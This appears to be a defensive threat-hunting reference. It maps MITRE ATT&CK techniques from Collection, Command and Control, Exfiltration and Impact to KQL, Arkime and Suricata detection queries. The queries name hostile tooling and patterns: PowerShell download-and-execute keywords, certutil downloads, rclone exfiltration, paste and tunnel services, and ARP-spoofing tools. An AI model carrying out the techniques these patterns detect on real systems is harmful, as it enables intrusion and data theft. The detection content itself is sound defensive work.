event.category: process_creation AND process.name: (7z.exe OR 7za.exe OR winzip.exe OR winzip64.exe OR rar.exe OR winrar.exe)
process.name: 7z*.exe AND process.command_line: *-p *
process.name: winzip*.exe AND process.command_line: *-s *
process.name: rar.exe AND process.command_line: *-hp*
KQLPowerShell Compress-Archive usage
process.name: powershell.exe AND process.command_line: *Compress-Archive*
KQLArchive file creation event
file.name: (*.zip OR *.gzip OR *.tar OR *.7z OR *.rar) AND event.type: creation
T1560.003

Archive Collected Data: Archive via Custom Method

[MITRE]
Adversaries write custom code to compress/encrypt data prior to exfiltration, avoiding standard archive tool signatures. Look for RAR/7zip with custom passwords or archive deletion flags.
KQLRAR or 7zip with password and delete-after-archive flags (custom staging)
event.type: ("start" OR "process_started") AND (
  (process.name: "rar.exe" AND process.args: "a" AND process.args: ("-hp*" OR "-p*" OR "-dw" OR "-tb" OR "-ta")) OR
  (process.pe.original_file_name: ("7z.exe" OR "7za.exe") AND process.args: "a" AND process.args: ("-p*" OR "-sdel"))
)
KQLArchive file creation โ€” any compressed file extension
file.name: (*.zip OR *.7z OR *.rar OR *.gzip) AND event.type: creation
T1557

Adversary-in-the-Middle

[MITRE]
Adversaries position themselves between two hosts via ARP spoofing or rogue DHCP to silently capture sensitive data, intellectual property, or proprietary communications as they flow across the network. Also appears in Credential Access.
KQLARP spoofing / network redirection tools executing on endpoints
process.name: ("arpspoof" OR "ettercap" OR "bettercap" OR "mitmproxy") AND NOT user.name: "root"
ArkimeARP Poisoning โ€” multiple MACs claiming same IP (default gateway)
protocols == arp && arp.opcode == 2
T1185

Browser Session Hijacking

[MITRE]
Adversaries hijack active, already-authenticated browser sessions to access internal CRM portals, O365, or financial software โ€” bypassing authentication and MFA by riding the existing browser process.
KQLBrowser launched with debugging port open โ€” adversary can interact with live session via API
process.name: ("chrome.exe" OR "msedge.exe") AND process.command_line: "*--remote-debugging-port=*"
T1530

Data from Cloud Storage

[MITRE]
Adversaries target cloud-hosted data (AWS S3, Azure Blob, GCP Cloud Storage) via massive volumes of GetObject or Sync API calls โ€” datasets that can include full database backups and data lake exports.
KQLMass extraction of S3 objects โ€” often indicates syncing an entire bucket externally
event.dataset: "aws.cloudtrail" AND event.provider: "s3.amazonaws.com" AND event.action: "GetObject" | stats count by user.name | where count > 1000
T1602

Data from Configuration Repository

[MITRE]
Adversaries search source code repositories (GitHub, GitLab, Bitbucket) or network configuration systems (SolarWinds, Ansible) for hardcoded API keys, passwords, database connection strings, or proprietary source code.
KQLMass repository cloning/download activity by a single user or service account
event.dataset: ("github.audit" OR "gitlab.audit") AND event.action: ("git.clone" OR "repository.download") | stats count by user.name | where count > 10
ArkimeLarge SSH/HTTPS transfers from internal Git servers to non-developer endpoints
ip.src == [Git_Server_IP] && bytes > 10000000
T1056

Input Capture

[MITRE]
Beyond stealing passwords, keyloggers capture drafted emails, proprietary code written in IDEs, Slack/Teams chat messages, and search queries โ€” providing massive situational context. Also appears in Credential Access.
KQLKeyloggers dropping output files to temp directories (updated continuously as user types)
winlog.event_id: 11 AND file.path: ("*\\Temp\\*.log" OR "*\\AppData\\Local\\Temp\\*.txt") AND process.executable: ("*\\Temp\\*.exe" OR "*\\AppData\\Local\\Temp\\*.exe")
T1125

Video Capture

[MITRE]
Highly targeted adversaries (corporate espionage, extortion) capture live webcam video to surveil the user, their surroundings, and anyone they speak with โ€” using Windows Camera APIs (Media Foundation) or /dev/video on Linux.
KQLUntrusted apps receiving webcam consent via registry (Sysmon Event ID 12/13)
winlog.event_id: (12 OR 13) AND registry.path: "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\webcam\\*"
KQLLinux: tools interacting with video capture devices
process.name: ("ffmpeg" OR "vlc" OR "mpv") AND process.command_line: "*/dev/video*" AND NOT user.name: "root"

Command & Control TA0011

Adversaries use command and control (C2) communications to hide their activity and blend in with legitimate traffic. Techniques range from using standard protocols (HTTP, DNS, SMTP) to custom encryption and obfuscation.

T1001

Data Obfuscation

[MITRE]
Adversaries obfuscate C2 traffic by adding junk data, using steganography, or impersonating legitimate protocols to make content harder to detect or decode.
KQLSuspicious POST requests (SLOTHFULMEDIA uses POST for C2)
http.request.method: POST
KQLPowerShell/cmd using base64 or encoded commands
process.name: (powershell.exe OR cmd.exe) AND process.command_line: *base64*
process.name: powershell.exe AND process.command_line: (*-e* OR *-enc*)
ArkimeHigh-entropy HTTP (entropy 6-8) โ€” obfuscated C2 data
http.method == [GET,POST] && http.statuscode == 200 && entropy.http==[6,7,8] && ip.dst != [<private IPs>]
http.method == [GET,POST] && http.statuscode == 200 && http.content-type == application/x-www-form-urlencoded
T1001.002

Steganography

[MITRE]
Adversaries hide C2 data in digital messages (images, PDFs, documents). Difficult to detect at scale โ€” focus on specific suspicious hosts. IOCs of known C2 domains or IPs help corroborate findings.
ArkimeHigh-entropy HTTP with URI and hostname present โ€” potential steganography carrier files
protocols == http && http.uri == EXISTS! && http.host == EXISTS! && http.method == [GET,POST] && http.statuscode == 200 && entropy.http == [6,7,8]
InfoAnalyst note
-- Focus on specific suspicious hosts rather than bulk scanning
-- Use CyberChef to identify encoded content in libfile-parsed file transfers
-- Correlate with known C2 domain/IP IOCs to corroborate findings
T1008

Fallback Channels

[MITRE]
Adversaries configure backup C2 channels used if the primary is disrupted. Tools like PlugX, Cobalt Strike, and Empire support multiple fallback channels using SSL tunneling or HTTP persistence flags.
KQLProcess args indicating C2 tunneling/fallback flags
process.command_line: (*-SSL* OR *-Si* OR *-Sp* OR *-Up* OR *-Pi* OR *-Pp* OR *-HTTP*)
-- -SSL: TLS tunneling  -Si: C2 IP  -Sp: C2 port  -Up: C2 UDP port
-- -Pi: proxy IP  -Pp: proxy port  -HTTP: HTTP persistent connection
InfoNetwork detection approach
-- Look for client sending significantly more data than it receives (upload-heavy)
-- Processes with unexpected external network connections
-- Packet contents not matching expected protocol behavior for the port used
T1071

Application Layer Protocol

[MITRE]
Adversaries abuse standard application-layer protocols (IRC, Telnet, RDP, Stratum) to blend C2 traffic with legitimate network activity.
ArkimeIRC traffic (common malware C2 channel)
protocols == irc || port == [194,6667]
ArkimeTelnet traffic โ€” suspicious on modern networks
protocols == telnet || port == 23
ArkimeStratum protocol โ€” cryptojacking C2 (Lucifer malware uses port 10001)
protocols == stratum || port == 10001
ArkimeRDP on non-standard port (NETEAGLE uses TCP/7519)
protocols == rdp || port == 7519
T1071.001

Web Protocols (HTTP/S)

[MITRE]
Adversaries use HTTP and HTTPS for C2 traffic to blend with normal web browsing. Look for suspicious user-agents, unusual TLS certificates, and HTTP POST to unknown external destinations.
KQLPowerShell beaconing with suspicious user-agents
process.name: powershell.exe AND process.command_line: *Invoke-WebRequest* AND process.command_line: (*HttpBrowser* OR *Wget* OR *Opera*)
KQLCurl beaconing with suspicious user-agents
process.name: curl.exe AND process.command_line: *-s* AND process.command_line: *-A* AND process.command_line: (*HttpBrowser* OR *Wget* OR *Opera*)
KQLKnown malicious TLS certificate hashes (update with threat intel)
event.category:(network or network_traffic) AND (
  tls.server.hash.md5:950098276A495286EB2A2556FBAB6D83 OR
  tls.server.hash.sha1:6ECE5ECE4192683D2D84E25B0BA7E04F9CB7EB7C OR
  tls.server.hash.sha256:87F2085C32B6A2CC709B365F55873E207A9CAA10BFFECF2FD16D3CF9D94D390C
)
ArkimeHTTP POST to external; TLS JA3 fingerprinting
http.method==POST && host.http==EXISTS!
tls.ja3 ==EXISTS!
T1071.002

File Transfer Protocols (FTP/SMB)

[MITRE]
Adversaries use FTP, FTPS, TFTP, or SMB as C2 channels. Verify authorized users and expected endpoints. External SMB connections are particularly suspicious.
ArkimeFTP/FTPS/TFTP traffic โ€” verify authorized users
protocols == ftp || protocols == ftps || protocols == tftp
port == [20,21,990,989,69]
ArkimeSMB traffic โ€” flag external SMB connections
protocols == smb || port == [445,137,138,139]
T1071.003

Mail Protocols (SMTP/IMAP)

[MITRE]
Adversaries use email protocols (SMTP, IMAP, POP3) for C2 โ€” commands sent as email messages. Look for unusual SMTP traffic, especially from non-mail servers.
ArkimeSMTP/SMTPS/POP3/IMAP traffic on expected ports
protocols == smtp || protocols == smtps || protocols == pop3 || protocols == imap
port == [143,993,110,995,25,465]
KQLHTTP to bare IP address on common ports (C2 masquerading as mail)
event.category:(network OR network_traffic) AND network.protocol:http AND network.transport:tcp AND url.full:/http:\/\/[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\/cd/ AND destination.port:(53 OR 80 OR 8080 OR 443)
ArkimeSessions with email attachment filename fields present
email.fn == EXISTS!
T1071.004

DNS

[MITRE]
Adversaries use DNS for C2 โ€” encoding data in DNS queries/responses (DNS tunneling). A high volume of NXDOMAIN responses can indicate malware beaconing to DGA-generated domains.
KQLnslookup with query type args โ€” potential DNS tunneling
event.category:process AND event.type:start AND process.name:nslookup.exe AND process.args:(-querytype=* OR -qt=* OR -q=* OR -type=*)
InfoDNS tunneling visualization using Kibana + Zeek
-- Create Kibana vertical bar graph:
--   Filter: event.module:"zeek" AND fileset.name:"dns"
--   Y-axis: Unique Count of dns.question.name
--   X-axis: Term aggregation on source.ip
-- Hosts with far more unique DNS queries than peers are suspicious
-- High NXDOMAIN rate = possible DGA malware C2 beaconing
T1090

Proxy

[MITRE]
Adversaries use proxies (SOCKS, HTTP) to route C2 traffic through intermediary systems, obscuring the true origin or destination.
ArkimeSOCKS proxy traffic
protocols == socks
port == 5090
T1090.002

External Proxy (P2P/Tor)

[MITRE]
Adversaries route C2 through Tor or peer-to-peer applications. P2P clients are policy violations and indicators of compromise on managed networks.
KQLKnown P2P / torrent client process names
process.name: (amule.exe OR ares.exe OR azureus.exe OR bearshare.exe OR bitcomet.exe OR bitlord.exe OR bittorrent.exe OR deluge.exe OR frostwire.exe OR limewire.exe OR mlnet.exe OR overnet.exe OR popcorn-time.exe OR pplive.exe OR qtorrent.exe OR tribler.exe OR tvants.exe OR utorrent.exe OR vuze.exe OR zultrax.exe) OR process.name: *torrent*
T1090.003

Multi-hop Proxy

[MITRE]
Adversaries chain multiple proxies (Tor onion routing) to obscure C2 traffic origin. Obtain authoritative list of approved VPN servers from network team to baseline against.
KQLTor client process execution
process.name: tor.exe
InfoDetection approach
-- Request list of authorized VPN servers from network team
-- Analyze VPN and ICMP traffic for anomalies
-- Obtain Tor exit/guard node IP lists from threat intel feeds
T1092

Communication through Removable Media

[MITRE]
Adversaries on air-gapped networks use removable media as a C2 channel โ€” writing commands to USB and reading responses from infected hosts. Monitor file access on removable media and auto-run processes.
KQLNew external device recognized; object access on removable media
event.code: (6416 OR 4663)
-- 6416: New external device recognized  4663: Object access performed
KQLProcess created from non-standard drive letter (check command line for removable drive letter)
event.code: 4688 AND NOT winlog.event_data.NewProcessName: ("C:\\*" OR "D:\\*")
T1095

Non-Application Layer Protocol (ICMP)

[MITRE]
Adversaries tunnel C2 data inside ICMP echo requests/responses. Normal ICMP pings have small payloads (~32 bytes); payloads >200 bytes are suspicious.
ArkimeICMP echo request/response โ€” filter for packets >200 bytes payload
ip.protocol == icmp && icmp.type == [0,8]
-- Add bytes filter for packets >200 bytes
-- icmp.request.code  icmp.response.code
KQLICMP via Zeek โ€” echo type 0/8
network.transport: icmp AND zeek.connection.icmp.type: (0 OR 8)
T1102

Web Service (Legitimate Cloud Abuse)

[MITRE]
Adversaries abuse legitimate cloud services (GitHub, Pastebin, Google Drive, OneDrive, Slack, ngrok) as C2 to blend with allowed traffic and avoid domain-based detection.
KQLDNS queries to known-abused cloud/paste/tunnel services from non-browser processes
network.protocol: dns AND NOT user.id: ("S-1-5-18" OR "S-1-5-19" OR "S-1-5-20") AND dns.question.name: (
  "raw.githubusercontent.*" OR "*.pastebin.*" OR "*drive.google.*" OR
  "*api.dropboxapi.*" OR "*dropboxusercontent.*" OR "*onedrive.*" OR
  "*slack-files.com" OR "*ghostbin.*" OR "*ngrok.*" OR "*portmap.*" OR
  "*serveo.net" OR "*localtunnel.me" OR "*pagekite.me" OR "*localxpose.io" OR
  "*notabug.org" OR "rawcdn.githack.*" OR "paste.nrecom.net" OR
  "zerobin.net" OR "controlc.com" OR "requestbin.net"
) AND NOT process.executable: (
  "?:\\Program Files\\*.exe" OR "?:\\Program Files (x86)\\*.exe" OR
  "?:\\Users\\*\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" OR
  "?:\\Users\\*\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"
)
T1105

Ingress Tool Transfer

[MITRE]
Adversaries download tools and payloads using built-in utilities: PowerShell, certutil, BITSAdmin, curl, wget. These LOLBins bypass application whitelisting and leave predictable command-line patterns.
KQLPowerShell downloading/executing remote content
process.name: powershell.exe AND process.command_line: (*downloadstring* OR *downloaddata* OR *downloadfile* OR *iex* OR *.invoke* OR *invoke-expression* OR *Invoke-WebRequest*)
KQLCertutil downloading malicious binaries
process.name: certutil.exe AND process.command_line: (*urlcache* AND *split*)
KQLBITSAdmin downloading files
process.name: bitsadmin.exe AND process.command_line: (*download* OR *transfer*)
KQLCertReq HTTP POST abuse for file transfer
event.type: "start" AND (process.name: "CertReq.exe" OR process.pe.original_file_name: "CertReq.exe") AND process.args: "-Post"
KQLdesktopimgdownldr used to download arbitrary files
event.type: "start" AND (process.name: "desktopimgdownldr.exe" OR process.pe.original_file_name: "desktopimgdownldr.exe") AND process.args: "/lockscreenurl:http*"
KQLcmd.exe making external network connections
event.category:network AND event.type:connection AND process.name:cmd.exe AND NOT destination.ip:(10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
KQLSysmon Ev3/Ev11: Network connection or file creation by LOLBin download tools
event.code: (3 OR 11) AND process.executable: (*bitsadmin.exe OR *rsync.exe OR *scp.exe OR *sftp.exe OR *certutil.exe OR *nc.exe OR *MpCmdRun.exe)
T1132.001

Standard Encoding

[MITRE]
Adversaries encode C2 data using standard schemes (Base64, XOR, compression) to obfuscate command content in transit. Certutil is commonly abused for encode/decode operations.
KQLCertutil used for encoding/decoding data
process.name: certutil.exe AND process.command_line: (*-encode* OR *-decode*)
KQLBase64/XOR in command line; compression tool execution
process.command_line: *base64*
process.command_line: *bxor*
process.name: (winzip.exe OR winrar.exe OR 7z.exe OR peazip.exe)
KQLPowerShell bitwise operators (encoding/XOR operations)
process.name: powershell.exe AND process.command_line: (*-band* OR *-bor* OR *-bxor* OR *-bnot* OR *-shl* OR *-shr*)
T1568.002

Domain Generation Algorithm (DGA)

[MITRE]
Malware uses DGA to generate many pseudo-random domain names for C2, making blocklisting ineffective. Detection: entropy analysis, Markov chains, NXDOMAIN volume, recently registered domains.
KQLTLS/HTTP traffic matching known stage DGA domain pattern
event.category:(network OR network_traffic) AND type:(tls OR http) AND network.transport:tcp AND destination.domain: /[a-z]{3}\.stage\.[0-9]{8}\..*/
InfoDGA detection approaches
-- CDN domains may trigger DGA detections due to similar naming patterns
-- Check for recently registered domains (WHOIS age < 30 days)
-- Look for high NXDOMAIN rates from single hosts
-- Use entropy/frequency analysis on dns.question.name in Kibana
T1571

Non-Standard Port

[MITRE]
Adversaries communicate using protocols on non-standard ports (e.g., SSH on 2222, HTTP on 8443) to evade port-based firewall rules and detection signatures.
KQLSSH connections on non-standard port (should be 22)
process.name: ssh AND event.action: (connection_attempted OR connection_accepted) AND NOT destination.port: 22
KQLSSH exec action (non-interactive C2 command execution)
event.action: exec AND process.name: ssh
T1572

Protocol Tunneling

[MITRE]
Adversaries tunnel protocols inside others (DNS-over-HTTPS, SSH tunneling, port forwarding) to bypass network controls. PortProxy registry keys are a reliable indicator of port forwarding setup.
KQLNew PortProxy port forwarding rule in registry (FP: legitimate net admin)
registry.path: ("HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*" OR "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\*")
T1573.001

Symmetric Cryptography

[MITRE]
Adversaries encrypt C2 channels using symmetric algorithms (AES, DES, 3DES, Blowfish, RC4). Some backdoors (Zebrocy, APT28) use these with recognizable command-line signatures.
KQLSysmon Ev1: Zebrocy/APT28 backdoor command patterns
event.code: 1 AND process.command_line: (*screenshot* OR *Sys_info* OR *Get-Network* OR *Scan_all*)
ArkimeEncrypted channels using TLS ciphers to external IPs
tls.cipher == EXISTS! && ip.dst != [<private IPs>]
KQLTLS cipher present on connections to external IPs
tls.cipher: * AND NOT destination.ip: (10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
T1573.002

Asymmetric Cryptography

[MITRE]
Adversaries use RSA/ECC for C2 channel encryption. Self-signed TLS certificates are a strong indicator โ€” legitimate servers use CA-signed certificates with valid trust chains.
SuricataSSL/TLS asymmetric C2 traffic detection
alert tcp any any -> any any (msg:"Asymmetric Cryptography Traffic Detected (SSL/TLS)";flow:established,from_server;content:"|01|";depth:1;offset:9;sid:1000005;rev:1;)
SuricataSelf-signed certificate detected in TLS handshake
alert tls any any -> any any (msg:"Self-Signed Certificate Detected";tls.cert_subject;content:"issuer";content:"OU";within:30;sid:1000006;rev:1;)
KQLSelf-signed certificates: both subject and authority key identifiers null
subject_key_identifier: null AND extensions.authority_key_identifier: null
T1659

Content Injection

[MITRE]
Adversaries inject malicious C2 code into legitimate, trusted websites so the firewall sees traffic to a reputable domain and allows it. The infected host beacons out to a hijacked trusted site instead of an evil domain. Also in Initial Access.
KQLRepetitive outbound HTTP 200 responses with tiny payload โ€” C2 heartbeat pattern
network.direction: "outbound" AND http.response.status_code: 200 AND http.response.bytes < 500 | stats count by url.original | where count > 1000
T1665

Hide Infrastructure

[MITRE]
Domain Fronting routes C2 traffic through CDNs (Cloudflare, Fastly, Azure) so the firewall sees connections to trusted IPs while the true C2 destination is hidden inside the encrypted HTTP Host header โ€” invisible without TLS inspection.
KQLDomain Fronting โ€” TLS SNI does not match HTTP Host header (requires SSL inspection proxy)
event.dataset: "proxy" AND tls.client.server_name: ("*google.com*" OR "*cloudfront.net*") AND NOT http.request.headers.host: ("*google.com*" OR "*cloudfront.net*")
InfoWithout SSL decryption the HTTP Host is invisible โ€” hunt via anomalous data volumes to CDN IPs
Without SSL decryption the HTTP Host header is invisible. Hunt for endpoints sending large sustained data transfers to CDN IP ranges that don't match normal baseline web browsing.
T1104

Multi-Stage Channels

[MITRE]
A tiny "stager" payload makes a brief network connection, downloads a fully featured C2 agent directly into memory, and hands over execution โ€” minimizing the footprint of the initial infection and evading file-based AV detection.
KQLStaging sequence: process makes network connection then immediately injects into another process (CreateRemoteThread โ€” Event ID 8)
winlog.event_id: 8 AND process.parent.name: ("powershell.exe" OR "cmd.exe" OR "wscript.exe")
-- Correlate injection timestamp with preceding outbound connections (Event ID 3)
T1219

Remote Access Tools

[MITRE]
Adversaries install legitimate commercial RMM tools (AnyDesk, TeamViewer, ConnectWise, Atera) that AV completely ignores and firewalls allow through โ€” providing a persistent, low-noise C2 channel disguised as IT support software.
KQLExecution of unauthorized commercial remote access tools on endpoints
process.name: ("AnyDesk.exe" OR "TeamViewer_Service.exe" OR "screenconnect.exe" OR "AteraAgent.exe" OR "meshagent.exe")
ArkimeDNS queries to commercial RMM infrastructure from standard user workstations
dns.host == r".*(anydesk|teamviewer|screenconnect|logmein|atera)\.com"
T1205

Traffic Signaling

[MITRE]
Port Knocking โ€” malware stays completely dormant until the adversary sends a specific sequence of connection attempts to closed ports (e.g., TCP 7000โ†’8000โ†’9000). Only then does it wake up and establish a C2 connection. Also in Defense Evasion.
KQLPort Knocking โ€” single external IP hitting multiple closed ports in rapid succession
event.action: "deny" AND network.transport: "tcp" | stats dc(destination.port) as ports_hit by source.ip | where ports_hit > 3

Exfiltration TA0010

Adversaries steal data by transferring it to adversary-controlled systems. Techniques include exfiltrating over the existing C2 channel, using alternative protocols, or physically transferring data via removable media.

T1041

Exfiltration Over C2 Channel

[MITRE]
Adversaries exfiltrate data over the same channel used for C2, avoiding the need for a separate exfiltration channel. Look for archive files being downloaded or POSTed over HTTP/S.
KQLArchive file download via C2 channel (staged collection being pulled out)
http.request.body.content: *download* AND http.request.body.content: (*.zip OR *.rar OR *.7z OR *.gz OR *.tar OR *.bz2 OR *.xz OR *.lzma OR *.lz4 OR *.zst)
KQLHTTP POST with archive file extension in URL/body (upload to C2)
http.request.method: POST AND url.original: (*.zip OR *.rar OR *.7z OR *.gz OR *.tar OR *.bz2 OR *.xz OR *.lzma OR *.lz4 OR *.zst)
T1048

Exfiltration Over Alternative Protocol

[MITRE]
Adversaries exfiltrate data using a protocol different from the C2 channel (FTP, DNS, SMTP, SMB). This separates exfiltration traffic from C2 traffic to complicate detection.
KQLSMTP traffic on port 26 (non-standard, often used to bypass mail filters)
event.category:(network OR network_traffic) AND network.transport:tcp AND (destination.port:26 OR (event.dataset:zeek.smtp AND destination.port:26))
ArkimeAlternative protocol traffic โ€” FTP, SMTP, HTTPS, DNS, SMB (especially to external IPs)
protocols == [ftp,smtp,https,dns,smb]
KQLRare internet SMB connections (SMB to external IPs is almost always malicious)
network.transport:tcp AND destination.port:(139 OR 445) AND NOT destination.ip:(10.0.0.0/8 OR 172.16.0.0/12 OR 192.168.0.0/16)
ArkimeOutbound FTP with STOR command (file upload to adversary FTP server)
protocols == ftp
-- Search session content for "STOR" command (file upload)
ArkimeOutbound HTTP POST (exfiltration upload)
protocols == http && http.method == POST
InfoDNS exfiltration detection โ€” high unique DNS query volume
-- Create Kibana visualization:
--   Filter: event.module:"zeek" AND fileset.name:"dns"
--   Y-axis: Unique Count of dns.question.name
--   X-axis: Term aggregation on source.ip
-- Hosts with abnormally high unique DNS query counts may be exfiltrating via DNS
T1052.001

Exfiltration Over USB

[MITRE]
Adversaries physically transfer data by copying files to a removable USB drive. Common in high-security environments where network exfil is blocked. Monitor for USB insertion events paired with file copy activity.
KQLNew external device recognized (USB insertion)
event.code: 6416
KQLProcess creation with command line โ€” check drive letter for removable media
event.code: 4688 AND winlog.event_data.CommandLine: *
-- Inspect drive letter in CommandLine: E:, F:, G: etc. may indicate removable drive
KQLUSB device connection/disconnection lifecycle events
event.code: (2003 OR 2100 OR 2102)
-- 2003: USB device connection initiated
-- 2100: Intermediate USB disconnection tracked
-- 2102: Final USB disconnection
T1020

Automated Exfiltration

[MITRE]
Adversaries use scripts or tools (Rclone, FileZilla, WinSCP, custom Python) to automatically transfer massive amounts of data as quickly as possible โ€” minimizing the window for defenders to detect and stop the exfiltration.
KQLCommand line file transfer utilities commonly abused for rapid automated exfiltration
process.name: ("rclone.exe" OR "pscp.exe" OR "filezilla.exe" OR "winscp.exe") AND process.command_line: ("*sync*" OR "*copy*") AND process.command_line: ("*ftp:*" OR "*sftp:*" OR "*scp:*")
ArkimeAutomated mass file transfers over FTP (high frequency STOR/PUT commands)
protocols == ftp && ftp.request.command == "STOR"
T1030

Data Transfer Size Limits

[MITRE]
Adversaries chunk stolen data into small pieces (5โ€“10MB) and send slowly over days or weeks ("low and slow") to evade DLP systems and NetFlow analytics that flag sudden bandwidth spikes.
KQLArchiving tools splitting data into small volumes for stealthy exfiltration (7z -v split)
process.name: ("7z.exe" OR "rar.exe" OR "tar") AND process.command_line: ("*-v*" OR "*split*") AND process.command_line: ("*m *" OR "*k *")
KQLRhythmic, uniform outbound transfers โ€” e.g., exactly 10MB sent every hour (NetFlow)
network.direction: "outbound" AND network.bytes >= 9500000 AND network.bytes <= 10500000 | stats count by destination.ip | where count > 20
T1011

Exfiltration Over Other Network Medium

[MITRE]
Adversaries bypass perimeter monitoring by using alternate physical networks โ€” cellular modems (4G/5G USB dongles), Bluetooth file transfers, or connecting to adjacent unmonitored Wi-Fi (guest network, rogue AP in parking lot).
KQLEndpoints bridging networks by connecting to unapproved Wi-Fi SSIDs (WLAN Operational log)
winlog.channel: "Microsoft-Windows-WLAN-AutoConfig/Operational" AND winlog.event_id: 8001 AND NOT winlog.event_data.SSID: "Corporate_WiFi"
InfoCellular/alternate Wi-Fi exfil is completely invisible to perimeter sensors
Data exfiltrated over cellular or a different Wi-Fi network bypasses the corporate firewall and IDS entirely. You will have zero network visibility. Rely on endpoint USB/adapter logs and WLAN event logs.
T1567

Exfiltration Over Web Service

[MITRE]
Adversaries use trusted consumer cloud storage (Google Drive, Dropbox, Mega, OneDrive) to exfiltrate data โ€” firewalls rarely block these services and DLP struggles to distinguish a legitimate upload from a data theft.
KQLHigh-volume uploads to consumer file-sharing services, especially from server subnets
event.dataset: "network_traffic" AND destination.domain: ("*dropbox.com*" OR "*drive.google.com*" OR "*mega.nz*" OR "*pastebin.com*") AND network.direction: "outbound"
ArkimeMassive HTTP POST/PUT to cloud storage APIs
http.method == "POST" && (host == "api.dropboxapi.com" || host == "www.googleapis.com" || host == "gofile.io")
T1029

Scheduled Transfer

[MITRE]
Adversaries schedule exfiltration to occur during non-business hours (e.g., 3AM Sunday) when IT staff is asleep, minimizing the chance of a network administrator noticing bandwidth spikes or investigating latency.
KQLMassive outbound transfers occurring exclusively outside business hours
network.direction: "outbound" AND source.bytes > 100000000 AND (hour_of_day > 20 OR hour_of_day < 5)
KQLScheduled tasks (svchost.exe parent) executing exfiltration tools
process.parent.name: "svchost.exe" AND process.name: ("curl.exe" OR "powershell.exe" OR "rclone.exe") AND process.command_line: ("*POST*" OR "*upload*")
T1537

Transfer Data to Cloud Account

[MITRE]
Adversaries copy victim cloud data (AWS snapshots, S3 objects) directly to an adversary-controlled cloud account over the provider's backend โ€” the transfer never crosses the victim's perimeter firewall, giving zero network visibility.
KQLAWS snapshots/AMIs being shared with unknown external Account IDs (primary cloud exfil method)
event.dataset: "aws.cloudtrail" AND event.action: ("ModifySnapshotAttribute" OR "ModifyImageAttribute") AND requestParameters.createVolumePermission.add.items.userId: *
InfoCloud-to-cloud exfil happens entirely on provider backend โ€” no perimeter visibility
Cloud-to-cloud exfiltration (e.g., AWS snapshot copy, S3 bucket sync to another account) happens on the provider's dark fiber. You will have zero network visibility. Rely entirely on CloudTrail / Azure Audit logs.

Impact TA0040

Adversaries use Impact techniques to disrupt availability or compromise integrity of systems and data. Goals range from denying service to end users, to destroying systems, to manipulating data for financial gain.

T1498

Network Denial of Service

[MITRE]
Adversaries flood network resources to degrade or deny service. Common attack types include SYN floods, ICMP/Smurf attacks, and Fraggle (UDP) attacks. Use Arkime for initial detection and Wireshark for deep-dive analysis.
ArkimeSYN flood: large volume of SYN with no ACK โ€” use Wireshark for per-packet analysis
protocols == tcp && tcpflags.syn == 1 && tcpflags.ack == 0
-- Each SYN should have different source IP with identical window size (spoofed sources)
ArkimeSmurf attack: unusual ICMP volume to/from many hosts
protocols == icmp
ArkimeFraggle attack: large UDP packets to echo/chargen ports 7 and 19
protocols == udp && port == [7,19]
T1529

System Shutdown/Reboot

[MITRE]
Adversaries shut down or reboot systems to disrupt access, interrupt processes, or force a restart to re-infect boot persistence. Ransomware commonly uses this after encryption is complete.
KQLSystem shutdown/restart initiated by application (Ev1074) or unexpected shutdown (Ev6006)
event.code: (1074 OR 6006)
-- 1074: System shutdown/restart initiated by a process
-- 6006: Event Log Service stopped (clean shutdown)
KQLAdditional shutdown/reboot/crash event codes
event.code: (41 OR 1076 OR 6005 OR 6008 OR 6013)
-- 41: Unexpected reboot (kernel power)
-- 1076: User-specified reason for last unexpected shutdown
-- 6005: Event Log Service started (system startup)
-- 6008: Unexpected/dirty shutdown recorded
-- 6013: System uptime
KQLshutdown.exe process execution (command-line forced shutdown)
process.name: shutdown.exe
T1531

Account Access Removal

[MITRE]
Adversaries lock legitimate users and administrators out of their own network by mass-resetting passwords, deleting Domain Admin accounts, or revoking MFA devices โ€” ensuring incident responders cannot log in to stop ongoing destruction.
KQLAdmin accounts resetting other admin passwords or deleting accounts in bulk (Event ID 4724, 4726)
winlog.event_id: (4724 OR 4726) AND winlog.event_data.TargetUserName: ("*admin*" OR "Administrator") AND NOT user.name: "SYSTEM"
T1485

Data Destruction

[MITRE]
Adversaries permanently destroy files and data with wiper malware (NotPetya, WhisperGate) or tools like sdelete.exe. Unlike ransomware, data destruction is pure sabotage โ€” no decryption key exists, making recovery impossible.
KQLNative Windows tools used to securely wipe files and free space
process.name: ("sdelete.exe" OR "cipher.exe" OR "fsutil.exe") AND process.command_line: ("*-z*" OR "*/w:*" OR "*usn deletejournal*")
KQLMassive volume of file deletions across the filesystem in a short window
event.category: "file" AND event.action: "deletion" AND file.path: ("*\\Documents\\*" OR "*\\Desktop\\*") | stats count by process.name | where count > 1000
T1486

Data Encrypted for Impact

[MITRE]
Ransomware. Adversaries encrypt files, databases, and network shares and demand cryptocurrency payment for the decryption key. High CPU/Disk I/O, mass file rename events (.docx โ†’ .docx.encrypted), and README_FOR_DECRYPT.txt drops are key indicators.
KQLRansomware encrypting network file shares โ€” massive write/rename operations over SMB (Event ID 5145)
winlog.event_id: 5145 AND winlog.event_data.AccessMask: "0x120116" | stats count by source.ip | where count > 5000
KQLRansomware note drops โ€” creation of text/html files in every directory
event.category: "file" AND event.action: "creation" AND file.name: ("*decrypt*" OR "*RECOVER*" OR "*ransom*" OR "*README*") | stats count by process.name | where count > 10
T1565

Data Manipulation

[MITRE]
Adversaries insert, delete, or modify stored/transmitted data to influence business decisions, sabotage operations, or destroy trust in data integrity โ€” without outright deletion, making the attack harder to detect.
KQLUnexpected bulk UPDATE/INSERT operations in database audit logs
event.dataset: "sql.audit" AND event.action: ("UPDATE" OR "INSERT" OR "DELETE") AND NOT user.name: ("app_service_account") | stats count by user.name | where count > 500
KQLBulk file modification events on sensitive document directories (Sysmon Event ID 2)
winlog.event_id: 2 AND file.path: ("*\\Finance\\*" OR "*\\HR\\*" OR "*\\Legal\\*") AND NOT process.name: ("WINWORD.EXE" OR "EXCEL.EXE")
T1491

Defacement

[MITRE]
